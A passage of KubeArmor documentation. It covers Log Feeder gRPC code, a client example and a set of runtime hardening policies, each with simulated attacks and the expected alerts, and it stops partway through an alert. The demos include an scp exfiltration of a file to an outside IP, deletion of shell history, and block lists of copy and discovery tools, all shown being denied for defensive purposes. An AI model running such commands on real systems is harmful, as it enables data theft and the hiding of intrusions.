	}
}

// PushLog Function (Called by the Daemon/System Monitor)
func (fd *Feeder) PushLog(log tp.Log) {
    // ... code to process the incoming internal log struct (tp.Log) ...

    // Convert the internal log struct (tp.Log) into the Protobuf Log or Alert struct (pb.Log/pb.Alert)
	// This involves mapping fields like ContainerID, ProcessName, Resource, Action, PolicyName etc.
    // The logic checks the type and fields to decide if it's an Alert or a general Log

	if log.Type == "MatchedPolicy" || log.Type == "MatchedHostPolicy" || log.Type == "SystemEvent" {
        // It's a security alert type of event
		pbAlert := pb.Alert{}
        // Copy fields from internal log struct to pbAlert struct
		pbAlert.Timestamp = log.Timestamp
        // ... copy other fields like ContainerID, PolicyName, Action, Resource ...

        // Broadcast the pbAlert to all connected clients watching alerts
		fd.EventStructs.AlertLock.Lock() // Lock for safe concurrent access
		defer fd.EventStructs.AlertLock.Unlock()
		for uid := range fd.EventStructs.AlertStructs {
			select {
			case fd.EventStructs.AlertStructs[uid].Broadcast <- &pbAlert: // Send to client's channel
			default:
                // If the client's channel is full, the message is dropped
				kg.Printf("alert channel busy, alert dropped.")
			}
		}
	} else {
        // It's a general system log type of event
		pbLog := pb.Log{}
		// Copy fields from internal log struct to pbLog struct
		pbLog.Timestamp = log.Timestamp
		// ... copy other fields like ContainerID, ProcessName, Resource ...

        // Broadcast the pbLog to all connected clients watching logs
		fd.EventStructs.LogLock.Lock() // Lock for safe concurrent access
		defer fd.EventStructs.LogLock.Unlock()
		for uid := range fd.EventStructs.LogStructs {
			select {
			case fd.EventStructs.LogStructs[uid].Broadcast <- &pbLog: // Send to client's channel
			default:
                // If the client's channel is full, the message is dropped
				kg.Printf("log channel busy, log dropped.")
			}
		}
	}
}

Explanation:

  • NewFeeder: This function, called during Daemon initialization, sets up the data structures (EventStructs) to manage client connections, creates a network listener for the configured gRPC port, and creates and registers the gRPC server (LogServer). It passes a reference to EventStructs and other data to the LogService implementation.

  • ServeLogFeeds: This function is run as a goroutine by the KubeArmor Daemon. It calls LogServer.Serve(), which makes the gRPC server start listening for incoming client connections and handling gRPC requests.

  • PushLog: This method is called by the KubeArmor Daemon (specifically, the part that processes events from the System Monitor) whenever a new security event or log needs to be reported. It takes KubeArmor's internal tp.Log structure, converts it into the appropriate Protobuf message (pb.Alert or pb.Log), and then iterates through all registered client connections (stored in EventStructs) broadcasting the message to their respective Go channels (Broadcast). If a client isn't reading fast enough, the message might be dropped due to the channel buffer being full.

Now let's see the client-side handling logic within the Log Feeder's gRPC service implementation.

Referencing KubeArmor/feeder/logServer.go:

// LogService Struct (Simplified)
type LogService struct {
	QueueSize    int // Max size of the channel buffer for each client
	EventStructs *EventStructs // Pointer to the feeder's connection store
	Running      *bool // Pointer to the feeder's running status
}

// WatchAlerts Function (Simplified - gRPC handler)
// This function is called by the gRPC server whenever a client calls the WatchAlerts RPC
func (ls *LogService) WatchAlerts(req *pb.RequestMessage, svr pb.LogService_WatchAlertsServer) error {
	// req contains client's request (e.g., filter options)
	// svr is the gRPC server stream to send messages back to the client

	// Add this client connection to the feeder's connection store
	// This creates a new Go channel for this specific client
	uid, conn := ls.EventStructs.AddAlertStruct(req.Filter, ls.QueueSize)
	kg.Printf("Added a new client (%s, %s) for WatchAlerts", uid, req.Filter)

	defer func() {
		// This code runs when the client disconnects or an error occurs
		close(conn) // Close the channel
		ls.EventStructs.RemoveAlertStruct(uid) // Remove from the store
		kg.Printf("Deleted the client (%s) for WatchAlerts", uid)
	}()

    // Loop continuously while KubeArmor is running and the client is connected
	for *ls.Running {
		select {
		case <-svr.Context().Done():
            // Client disconnected, exit the loop
			return nil
		case resp := <-conn:
            // A new pb.Alert message arrived on the client's channel (pushed by PushLog)
			if err := kl.HandleGRPCErrors(svr.Send(resp)); err != nil {
                // Failed to send to the client (e.g., network issue)
				kg.Warnf("Failed to send an alert=[%+v] err=[%s]", resp, err.Error())
				return err // Exit the loop with an error
			}
		}
	}

	return nil // KubeArmor is shutting down, exit gracefully
}

// WatchLogs Function (Simplified - gRPC handler, similar to WatchAlerts)
// This function is called by the gRPC server whenever a client calls the WatchLogs RPC
func (ls *LogService) WatchLogs(req *pb.RequestMessage, svr pb.LogService_WatchLogsServer) error {
    // ... Similar logic to WatchAlerts, but uses AddLogStruct, RemoveLogStruct,
    // and reads from the LogStructs' Broadcast channel to send pb.Log messages ...
    return nil // Simplified
}

Explanation:

  • LogService: This struct is the concrete implementation of the gRPC service defined in protobuf/kubearmor.proto. It holds references to the feeder's state.

  • WatchAlerts: This method is a gRPC streaming RPC handler. When a client initiates a WatchAlerts call, this function is executed. It creates a dedicated Go channel (conn) for that client using AddAlertStruct. Then, it enters a for loop. Inside the loop, it waits for either the client to disconnect (<-svr.Context().Done()) or for a new pb.Alert message to appear on the client's dedicated channel (<-conn). When a message arrives, it sends it over the gRPC stream back to the client using svr.Send(resp). This creates the real-time streaming behavior.

  • WatchLogs: This method is similar to WatchAlerts but handles subscriptions for general system logs (pb.Log messages).

This shows how the Log Feeder's gRPC server manages multiple concurrent client connections, each with its own channel, ensuring that events pushed by PushLog are delivered to all interested subscribers efficiently.

Connecting to the Log Feeder

The most common way to connect to the Log Feeder is using the karmor command-line tool provided with KubeArmor.

To watch security alerts:

karmor log --alert

To watch system logs:

karmor log --log

To watch both alerts and logs:

karmor log --alert --log

These commands are simply gRPC clients that connect to the KubeArmor Daemon's Log Feeder port on your nodes (or via the KubeArmor Relay service if configured) and call the WatchAlerts and WatchLogs gRPC methods.

You can also specify filters (e.g., by namespace or policy name) using karmor log options, which the Log Feeder's gRPC handlers can process (although the code snippets above show a simplified filter handling).

For integration with other systems, you would write a custom gRPC client application in your preferred language (Go, Python, Java, etc.) using the KubeArmor Protobuf definitions to connect to the feeder and consume the streams.
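
As a minimal sketch of such a client in Go (assuming the generated Protobuf/gRPC package github.com/kubearmor/KubeArmor/protobuf and a feeder reachable on localhost:32767; the filter value and printed fields are illustrative):

package main

import (
	"context"
	"fmt"

	pb "github.com/kubearmor/KubeArmor/protobuf"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

func main() {
	// Connect to the Log Feeder's gRPC port (default 32767).
	conn, err := grpc.Dial("localhost:32767",
		grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Subscribe to the alert stream via the generated client.
	client := pb.NewLogServiceClient(conn)
	stream, err := client.WatchAlerts(context.Background(),
		&pb.RequestMessage{Filter: "all"})
	if err != nil {
		panic(err)
	}

	// Print alerts as they arrive; Recv blocks until the next message.
	for {
		alert, err := stream.Recv()
		if err != nil {
			break
		}
		fmt.Printf("policy=%s op=%s source=%s resource=%s action=%s\n",
			alert.PolicyName, alert.Operation, alert.Source,
			alert.Resource, alert.Action)
	}
}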

Log Feeder Components Summary

| Component | Description | Located In | KubeArmor Role |
|---|---|---|---|
| gRPC Server | Listens for incoming client connections and handles RPC calls. | feeder/feeder.go | Exposes event streams to external clients. |
| LogService | Implementation of the gRPC service methods (WatchAlerts, WatchLogs). | feeder/logServer.go | Manages client connections and streams events. |
| EventStructs | Internal data structure (maps of channels) holding connections for each client type. | feeder/feeder.go | Enables broadcasting events to multiple clients. |
| Protobuf Defs | Define the structure of Alert and Log messages. | protobuf/kubearmor.proto | Standardizes the output format. |
| PushLog method | Method on the Feeder called by the Daemon to send new events. | feeder/feeder.go | Point of entry for events into the feeder. |

Conclusion

The Log Feeder is your essential window into KubeArmor's activity. By collecting enriched security events and telemetry from the System Monitor and Runtime Enforcer, formatting them using Protobuf, and streaming them over a gRPC interface, it provides real-time visibility into policy violations (alerts) and system behavior (logs). Tools like karmor log and integrations with SIEM systems rely on the Log Feeder to deliver crucial security insights from your KubeArmor-protected environment.

This chapter concludes our detailed look into the core components of KubeArmor! You now have a foundational understanding of how KubeArmor defines policies, identifies workloads, enforces rules, monitors system activity using eBPF, orchestrates these actions with the Daemon, and reports everything via the Log Feeder.

Thank you for following this tutorial series! We hope it has provided a clear and beginner-friendly introduction to the fascinating world of KubeArmor.

ModelArmor Overview

ModelArmor uses KubeArmor as a sandboxing engine to ensure that untrusted model execution is constrained and subject to the required checks. AI/ML models are essentially processes, and allowing untrusted models to execute in AI environments carries significant risks, such as cryptomining attacks leveraging GPUs or remote command injection. KubeArmor's preemptive mitigation mechanism provides a suitable framework for constraining the execution environment of models.

ModelArmor can be used to enforce security policies on the model execution environment.

TensorFlow Based Use Cases

FGSM Attack on a TensorFlow Model
▶️ Watch FGSM Attack Video

Keras Inject Attack and Apply Policies
▶️ Watch Keras Inject Video

Securing NVIDIA NIM
View PDF: Securing_NVIDIA_NIM.pdf

Least Permissive Access

KubeArmor helps organizations enforce a zero trust posture within their Kubernetes clusters. It allows users to define an allow-based policy that allows specific operations, and denies or audits all other operations. This helps to ensure that only authorized activities are allowed within the cluster, and that any deviations from the expected behavior are denied and flagged for further investigation.

By implementing a zero trust posture with KubeArmor, organizations can strengthen their security posture and reduce the risk of unauthorized access or activity within their Kubernetes clusters. This helps protect sensitive data, prevent system breaches, and maintain the integrity of the cluster.

Allow execution of only specific processes within the pod

  1. Install the nginx deployment using

    • kubectl create deployment nginx --image=nginx.

  2. Set the default security posture to default-deny.

    • kubectl annotate ns default kubearmor-file-posture=block --overwrite

  3. Apply the following policy:

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: only-allow-nginx-exec
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /
      recursive: true
  process:
    matchPaths:
    - path: /usr/sbin/nginx
    - path: /bin/bash
  action: Allow
EOF

Observe that the policy contains the Allow action. Once any KubeArmor policy with an Allow action selects a pod, the pod enters least-permissive mode, allowing only explicitly allowed operations. As part of allow-based rules you specify the set of processes that are allowed; everything else is either audited or denied based on the default security posture.

Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx; web access continues to work normally, since /usr/sbin/nginx is an allowed process.

Let's try to execute some other process:

kubectl exec -it $POD -- bash -c "chroot"

This is denied with "Permission denied", since chroot is not in the allowed set.

Challenges with maintaining Zero Trust Security Posture

Achieving a Zero Trust security posture is difficult; maintaining that posture across application updates is harder still, and there is a risk of application downtime if the required security posture is not correctly identified. While KubeArmor provides a way to enforce a Zero Trust security posture, identifying the policies/rules needed to achieve it is non-trivial, so keep the policies in dry-run mode (the default-audit posture) before switching to default-deny.

KubeArmor provides a framework to smooth the journey to a Zero Trust posture. For example, it is possible to set dry-run/audit mode at the namespace level by configuring the security posture. Thus, different namespaces can run in different default security posture modes (default-deny vs. default-audit), and users can switch a namespace to default-deny once they are comfortable with the settings (i.e., they no longer see unexpected alerts).
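For example (a sketch, assuming the default namespace), a namespace can be kept in audit posture first and switched to block later:

kubectl annotate ns default kubearmor-file-posture=audit --overwrite
kubectl annotate ns default kubearmor-network-posture=audit --overwrite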


Advanced

File Copy: Prevent file copy using standard utilities.

Description

Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Attack Scenario

It's important to note that file copy tools can be leveraged by attackers to exfiltrate sensitive data and to transfer malicious payloads into workloads; they can also assist in lateral movement within the system. It's crucial to take proactive measures to prevent these attacks.

Attack Type: Credential Access, Lateral Movement, Information Disclosure
Actual Attack: DarkBeam Data Breach, Shields Health Care Group data breach

Compliance

  • MITRE_TA0010_exfiltration

  • NIST_800-53_SI-4(18)

  • MITRE_TA0008_lateral_movement

Policy

File Copy

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-wordpress-remote-file-copy
  namespace: wordpress-mysql
spec:
  action: Block
  message: Alert! remote file copy tools execution prevented.
  process:
    matchPaths:
    - path: /usr/bin/rsync
    - path: /bin/rsync
    - path: /usr/bin/scp
    - path: /bin/scp
  selector:
    matchLabels:
      app: wordpress
  severity: 5
  tags:
  - MITRE
  - MITRE_TA0008_lateral_movement
  - MITRE_TA0010_exfiltration
  - MITRE_TA0006_credential_access
  - MITRE_T1552_unsecured_credentials
  - NIST_800-53_SI-4(18)
  - NIST
  - NIST_800-53
  - NIST_800-53_SC-4

Simulation

root@wordpress-fb448db97-wj7n7:/usr/bin# scp /etc/ca-certificates.conf 104.192.3.74:/mine/                              
bash: /usr/bin/scp: Permission denied                                                                                   
root@wordpress-fb448db97-wj7n7:/usr/bin#     

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 72178,
  "HostPPID": 30490,
  "Labels": "app=wordpress",
  "Message": "Alert! remote file copy tools execution prevented.",
  "NamespaceName": "wordpress-mysql",
  "Operation": "Process",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 259,
  "PPID": 193,
  "ParentProcessName": "/bin/bash",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "harden-wordpress-remote-file-copy",
  "ProcessName": "/usr/bin/scp",
  "Resource": "/usr/bin/scp /etc/ca-certificates.conf 104.192.3.74:/mine/",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "MITRE,MITRE_TA0008_lateral_movement,MITRE_TA0010_exfiltration,MITRE_TA0006_credential_access,MITRE_T1552_unsecured_credentials,NIST_800-53_SI-4(18),NIST,NIST_800-53,NIST_800-53_SC-4",
  "Timestamp": 1696487496,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T06:31:36.085860Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}


Network Access: Process based network access control

Description

Typically, within a pod/container, there are only specific processes that need to use network access. KubeArmor allows one to specify the set of binaries that are allowed to use network primitives such as TCP, UDP, and Raw sockets and deny everyone else.

Attack Scenario

In a possible attack scenario, an attacker binary may attempt to send a beacon to its Command and Control (C&C) server, and it may use network primitives to exfiltrate pod/container data and configuration. It's important to monitor network traffic and take proactive measures to prevent these attacks, such as implementing proper access controls and segmenting the network.

Attack Type: Denial of Service (DoS), Distributed Denial of Service (DDoS)
Actual Attack: DDoS attacks on websites of public institutions in Belgium, DDoS attack on the website of a city government in Germany

Compliance

  • Network Access

Policy

Network Access

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: restrict-process
  namespace: default
spec:
  severity: 4
  selector:
    matchLabels:
      app: nginx
  network:
    matchProtocols:
    - protocol: tcp
      fromSource:
      - path: /usr/bin/wget
    - protocol: udp
      fromSource:
      - path: /usr/bin/wget
  action: Allow

Simulation

Set the default security posture to default-deny

kubectl annotate ns default kubearmor-network-posture=block --overwrite
kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# curl www.google.com
curl: (6) Could not resolve host: www.google.com
root@nginx-77b4fdf86c-x7sdm:/# wget https://github.com/kubearmor/KubeArmor/blob/main/examples/wordpress-mysql/original/wordpress-mysql-deployment.yaml
--2023-10-06 11:08:58--  https://github.com/kubearmor/KubeArmor/blob/main/examples/wordpress-mysql/original/wordpress-mysql-deployment.yaml
Resolving github.com (github.com)... 20.207.73.82
Connecting to github.com (github.com)|20.207.73.82|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15051 (15K) [text/plain]
Saving to: 'wordpress-mysql-deployment.yaml.2'

wordpress-mysql-deployment.ya 100%[=================================================>]  14.70K  --.-KB/s    in 0.08s

2023-10-06 11:08:59 (178 KB/s) - 'wordpress-mysql-deployment.yaml.2' saved [15051/15051]

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 73952,
  "HostPPID": 73945,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "Network",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 532,
  "PPID": 525,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/curl",
  "Resource": "domain=AF_INET type=SOCK_DGRAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Result": "Permission denied",
  "Source": "/usr/bin/curl www.google.com",
  "Timestamp": 1696588301,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T10:31:41.935146Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}
/tmp/ noexec: Do not allow execution of binaries from /tmp/ folder.

Description

If provided the necessary privileges, users have the ability to install software in organizational information systems. To maintain control over the types of software installed, organizations identify permitted and prohibited actions regarding software installation. Prohibited software installations may include, for example, software with unknown or suspect pedigrees or software that organizations consider potentially malicious.

Attack Scenario

In an attack scenario, a hacker may attempt to inject malicious scripts into the /tmp folder through a web application exploit. Once the script is uploaded, the attacker may try to execute it on the server in order to take it down. By hardening the /tmp folder, the attacker is unable to execute the script, preventing such attacks. It's essential to implement these security measures to protect the system.

Attack Type: System Failure, System Breach
Actual Attack: Shields Health Care Group data breach, MOVEit Breach

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 1.1.5

  • Control-Id: 1.1.10

Policy

/tmp/ noexec

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-exec-inside-tmp
  namespace: wordpress-mysql
spec:
  tags:
  - CIS
  - CIS-control-1.1.5
  message: Alert! Execution attempted inside tmp folder
  selector:
    matchLabels:
      app: wordpress
  process:
    matchDirectories:
    - dir: /tmp/
      recursive: true
  action: Block

Simulation

root@wordpress-fb448db97-wj7n7:/var/tmp# ls /var/tmp
xvzf
root@wordpress-fb448db97-wj7n7:/var/tmp# /var/tmp/xvzf
bash: /var/tmp/xvzf: Permission denied
root@wordpress-fb448db97-wj7n7:/var/tmp#

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPEN flags=O_WRONLY|O_CREAT|O_EXCL|O_TRUNC",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 30490,
  "HostPPID": 6119,
  "Labels": "app=wordpress",
  "Message": "Alert! Execution attempted inside /tmp",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 193,
  "PPID": 6119,
  "ParentProcessName": "/var/lib/rancher/k3s/data/24a53467e274f21ca27cec302d5fbd58e7176daf0a47a2c9ce032ee877e0979a/bin/containerd-shim-runc-v2",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "ksp-block-exec-inside-tmp",
  "ProcessName": "/bin/bash",
  "Resource": "/tmp/sh-thd-2512146865",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/bash",
  "Tags": "CIS,CIS_Linux",
  "Timestamp": 1696492433,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T07:53:53.259403Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

Admin tools: Do not allow execution of administrative/maintenance tools inside the pods.

Description

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.

Attack Scenario

It's important to note that attackers with permissions could potentially run 'kubectl exec' to execute malicious code and compromise resources within a cluster. It's crucial to monitor the activity within the cluster and take proactive measures to prevent these attacks from occurring.

Attack Type: Command Injection, Lateral Movements, etc.
Actual Attack: Target cyberattack, Supply Chain Attacks

Compliance

  • NIST_800-53_AU-2

  • MITRE_T1609_container_administration_command

  • NIST_800-53_SI-4

Policy

Admin tools

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-dvwa-web-k8s-client-tool-exec
  namespace: default
spec:
  action: Block
  message: Alert! k8s client tool executed inside container.
  process:
    matchPaths:
    - path: /usr/local/bin/kubectl
    - path: /usr/bin/kubectl
    - path: /usr/local/bin/docker
    - path: /usr/bin/docker
    - path: /usr/local/bin/crictl
    - path: /usr/bin/crictl
  selector:
    matchLabels:
      app: dvwa-web
      tier: frontend
  severity: 5
  tags:
  - MITRE_T1609_container_administration_command
  - MITRE_TA0002_execution
  - MITRE_T1610_deploy_container
  - MITRE
  - NIST_800-53
  - NIST_800-53_AU-2
  - NIST_800-53_SI-4
  - NIST

Simulation

kubectl exec -it dvwa-web-566855bc5b-4j4vl -- bash
root@dvwa-web-566855bc5b-4j4vl:/var/www/html# kubectl
bash: /usr/bin/kubectl: Permission denied
root@dvwa-web-566855bc5b-4j4vl:/var/www/html#

Expected Alert

{
  "ATags": null,
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "32015ebeea9e1f4d4e7dbf6608c010ef2b34c48f1af11a5c6f0ea2fd27c6ba6c",
  "ContainerImage": "docker.io/cytopia/dvwa:php-8.1@sha256:f7a9d03b1dfcec55757cc39ca2470bdec1618b11c4a51052bb4f5f5e7d78ca39",
  "ContainerName": "dvwa",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HashID": "1167b21433f2a4e78a4c6875bb34232e6a2b3c8535e885bb4f9e336fd2801d92",
  "HostName": "aditya",
  "HostPID": 38035,
  "HostPPID": 37878,
  "Labels": "tier=frontend,app=dvwa-web",
  "Message": "",
  "NamespaceName": "default",
  "Operation": "Process",
  "Owner": {
    "Name": "dvwa-web",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 554,
  "PPID": 548,
  "PodName": "dvwa-web-566855bc5b-4j4vl",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/kubectl",
  "Resource": "/usr/bin/kubectl",
  "Result": "Permission denied",
  "Severity": "",
  "Source": "/bin/bash",
  "Tags": "",
  "Timestamp": 1696326880,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T09:54:40.056501Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

Discovery tools: Do not allow discovery/search of tools/configuration.

Description

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.

Attack Scenario

Adversaries can potentially use information related to services, remote hosts, and local network infrastructure devices, including those that may be vulnerable to remote software exploitation, to perform malicious attacks like exploiting open ports and injecting payloads to get remote shells. It's crucial to take proactive measures to prevent these attacks from occurring, such as implementing proper network segmentation and hardening network devices.

Attack Type: Reconnaissance, Brute force, Command Injection
Actual Attack: Microsoft Exchange server attack 2021

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.3

Policy

Discovery tools

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-dvwa-web-network-service-scanning
  namespace: default
spec:
  action: Block
  message: Network service has been scanned!
  process:
    matchPaths:
    - path: /usr/bin/netstat
    - path: /bin/netstat
    - path: /usr/sbin/ip
    - path: /usr/bin/ip
    - path: /sbin/ip
    - path: /bin/ip
    - path: /usr/sbin/iw
    - path: /sbin/iw
    - path: /usr/sbin/ethtool
    - path: /sbin/ethtool
    - path: /usr/sbin/ifconfig
    - path: /sbin/ifconfig
    - path: /usr/sbin/arp
    - path: /sbin/arp
    - path: /usr/sbin/iwconfig
    - path: /sbin/iwconfig
  selector:
    matchLabels:
      app: dvwa-web
      tier: frontend
  severity: 5
  tags:
  - MITRE
  - FGT1046
  - CIS

Simulation

kubectl exec -it dvwa-web-566855bc5b-xtgwq -- bash
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# netstat
bash: /bin/netstat: Permission denied
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# ifconfig
bash: /sbin/ifconfig: Permission denied
root@dvwa-web-566855bc5b-xtgwq:/var/www/html#
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# arp
bash: /usr/sbin/arp: Permission denied

Expected Alert

{
  "Action": "Block",
  "ClusterName": "no-trust",
  "ContainerID": "e8ac2e227d293e76ab81a34945b68f72a2618ed3275ac64bb6a82f9cd2d014f1",
  "ContainerImage": "docker.io/cytopia/dvwa:php-8.1@sha256:f7a9d03b1dfcec55757cc39ca2470bdec1618b11c4a51052bb4f5f5e7d78ca39",
  "ContainerName": "dvwa",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 35592,
  "HostPPID": 35557,
  "Labels": "tier=frontend,app=dvwa-web",
  "Message": "Network service has been scanned!",
  "NamespaceName": "default",
  "Operation": "Process",
  "Owner": {
    "Name": "dvwa-web",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 989,
  "PPID": 983,
  "ParentProcessName": "/bin/bash",
  "PodName": "dvwa-web-566855bc5b-npjn8",
  "PolicyName": "harden-dvwa-web-network-service-scanning",
  "ProcessName": "/bin/netstat",
  "Resource": "/bin/netstat",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "MITRE,FGT1046,CIS",
  "Timestamp": 1696501152,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T10:19:12.809606Z",
  "cluster_id": "4225",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

Logs delete: Do not allow external tooling to delete logs/traces of critical components.

Description

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Attack Scenario

It's important to note that removal of indicators related to intrusion activity may interfere with event collection, reporting, or other processes used to detect such activity. This can compromise the integrity of security solutions by causing notable events to go unreported. Additionally, this activity may impede forensic analysis and incident response, due to a lack of sufficient data to determine what occurred. It's crucial to ensure that all relevant indicators are properly monitored and reported to prevent such issues from occurring.

Attack Type: Integrity Threats, Data Manipulation
Actual Attack: NetWalker, Conti, DarkSide RaaS

Compliance

  • CIS Distribution Independent Linux v2.0

  • Control-Id: 6.6

  • Control-Id: 7.6.2

  • Control-Id: 7.6.3

  • NIST_800-53_CM-5

Policy

Logs delete

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-nginx-shell-history-mod
  namespace: default
spec:
  action: Block
  file:
    matchPaths:
    - fromSource:
      - path: /usr/bin/shred
      - path: /usr/bin/rm
      - path: /bin/mv
      - path: /bin/rm
      - path: /usr/bin/mv
      path: /root/*_history
    - fromSource:
      - path: /usr/bin/shred
      - path: /usr/bin/rm
      - path: /bin/rm
      - path: /bin/mv
      - path: /usr/bin/mv
      path: /home/*/*_history
  message: Alert! shell history modification or deletion detected and prevented
  process:
    matchPaths:
    - path: /usr/bin/shred
    - path: /usr/bin/rm
    - path: /bin/mv
    - path: /bin/rm
    - path: /usr/bin/mv
  selector:
    matchLabels:
      app: nginx
  severity: 5
  tags:
  - CIS
  - NIST_800-53
  - NIST_800-53_CM-5
  - NIST_800-53_AU-6(8)
  - MITRE_T1070_indicator_removal_on_host
  - MITRE
  - MITRE_T1036_masquerading

Simulation

kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# rm ~/.bash_history
rm: cannot remove '/root/.bash_history': Permission denied
root@nginx-77b4fdf86c-x7sdm:/# rm ~/.bash_history
rm: cannot remove '/root/.bash_history': Permission denied

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_UNLINKAT flags=",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 43917,
  "HostPPID": 43266,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "File",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 392,
  "PPID": 379,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/rm",
  "Resource": "/root/.bash_history",
  "Result": "Permission denied",
